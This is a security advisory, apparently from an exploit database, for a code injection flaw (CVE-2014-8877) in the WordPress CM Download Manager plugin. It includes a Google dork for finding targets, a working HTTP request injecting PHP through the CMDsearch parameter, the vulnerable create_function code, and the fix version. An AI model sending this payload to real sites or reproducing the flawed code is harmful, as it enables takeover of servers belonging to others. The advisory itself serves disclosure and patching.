WordPress CM Download Manager 2.0.0 Code Injection Vulnerability

2014-11-20T00:00:00
ID 1337DAY-ID-22907
Type zdt
Reporter rrdw
Modified 2014-11-20T00:00:00

Description

WordPress CM Download Manager plugin versions 2.0.0 and below suffer from a code injection vulnerability.

                                        
                                            Vulnerability title: Code Injection in Wordpress CM Download Manager plugin
CVE: CVE-2014-8877 
Plugin: CM Download Manager plugin
Vendor: CreativeMinds - https://www.cminds.com/
Product: https://wordpress.org/plugins/cm-download-manager/
Affected version: 2.0.0 and previous version
Fixed version: 2.0.4
Google dork: inurl:cmdownloads
Reported by: Phi Le Ngoc - [email protected]
Credits to ITAS Team - www.itas.vn


::DESCRITION::
 
The code injection vulnerability has been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker gains full control of the application and the ability to use any operating system functions that are available to the scripting environment. 

GET /cmdownloads/?CMDsearch=".phpinfo()." HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: _ga=GA1.2.1698795018.1415614778; _gat=1; PHPSESSID=okt6c51s4esif2qjq451ati7m6; cmdm_disclaimer=Y; JSB=1415614988879 
Connection: keep-alive

Vulnerable file:/wp-content/plugins/cm-download-manager/lib/controllers/CmdownloadController.php
Vulnerable code: (Line: 130 -> 158)


public static function alterSearchQuery($search, $query)
    {
        if( ( (isset($query->query_vars['post_type']) && $query->query_vars['post_type'] == CMDM_GroupDownloadPage::POST_TYPE) && (!isset($query->query_vars['widget']) || $query->query_vars['widget'] !== true) ) && !$query->is_single && !$query->is_404 && !$query->is_author && isset($_GET['CMDsearch']) )
        {
            global $wpdb;
            $search_term = $_GET['CMDsearch'];
            if( !empty($search_term) )
            {
                $search = '';
                $query->is_search = true;
                // added slashes screw with quote grouping when done early, so done later
                $search_term = stripslashes($search_term);
                preg_match_all('/".*?("|$)|((?<=[\r\n\t ",+])|^)[^\r\n\t ",+]+/', $search_term, $matches);
                $terms = array_map('_search_terms_tidy', $matches[0]);

                $n = '%';
                $searchand = ' AND ';
                foreach((array) $terms as $term)
                {
                    $term = esc_sql(like_escape($term));
                    $search .= "{$searchand}(($wpdb->posts.post_title LIKE '{$n}{$term}{$n}') OR ($wpdb->posts.post_content LIKE '{$n}{$term}{$n}'))";
                }
                add_filter('get_search_query', create_function('$q', 'return "' . $search_term . '";'), 99, 1);
                remove_filter('posts_request', 'relevanssi_prevent_default_request');
                remove_filter('the_posts', 'relevanssi_query');
            }
        }
        return $search;
}

::SOLUTION::
Update to version 2.0.4

::DISCLOSURE::
2014-11-08 initial vendor contact
2014-11-10 vendor response
2014-11-10 vendor confirmed 
2014-11-11 vendor release patch
2014-11-14 public disclosure

#  0day.today [2018-01-03]  #